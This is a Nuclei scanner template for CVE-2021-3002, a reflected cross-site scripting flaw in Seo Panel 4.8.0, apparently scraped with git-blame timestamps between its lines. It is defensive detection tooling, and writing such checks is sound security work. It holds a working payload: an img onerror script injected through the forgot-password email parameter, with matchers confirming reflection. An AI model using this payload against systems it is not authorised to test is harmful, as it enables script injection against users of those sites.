2022-03-07 19:47:40 +00:00
|
|
|
id: CVE-2021-3002
|
|
|
|
|
|
|
|
info:
|
2022-08-29 13:55:23 +00:00
|
|
|
name: Seo Panel 4.8.0 - Cross-Site Scripting
|
2022-03-07 19:47:40 +00:00
|
|
|
author: edoardottt
|
|
|
|
severity: medium
|
2022-08-29 13:55:23 +00:00
|
|
|
description: Seo Panel 4.8.0 contains a reflected cross-site scripting vulnerability via the seo/seopanel/login.php?sec=forgot email parameter.
|
2023-09-06 12:09:01 +00:00
|
|
|
remediation: |
|
|
|
|
Upgrade to a patched version of Seo Panel or apply the necessary security patches provided by the vendor.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- http://www.cinquino.eu/SeoPanelReflect.htm
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://github.com/seopanel/Seo-Panel/issues/202
|
2022-08-29 13:55:23 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-3002
|
2022-03-07 19:47:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 6.1
|
|
|
|
cve-id: CVE-2021-3002
|
|
|
|
cwe-id: CWE-79
|
2023-10-14 11:27:55 +00:00
|
|
|
epss-score: 0.00143
|
|
|
|
epss-percentile: 0.49878
|
2023-09-06 12:09:01 +00:00
|
|
|
cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: "seopanel"
|
|
|
|
product: seo_panel
|
|
|
|
tags: cve,cve2021,seopanel,xss
|
2022-03-07 19:47:40 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-03-07 19:47:40 +00:00
|
|
|
- raw:
|
2022-03-07 19:58:57 +00:00
|
|
|
- |
|
2022-03-07 19:47:40 +00:00
|
|
|
POST /seo/seopanel/login.php?sec=forgot HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
sec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "text/html"
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
2022-03-07 19:58:57 +00:00
|
|
|
- "<img src=a onerror=alert(document.domain)>"
|
|
|
|
- "seopanel"
|
2022-08-29 13:55:23 +00:00
|
|
|
condition: and
|
2023-07-11 19:49:27 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|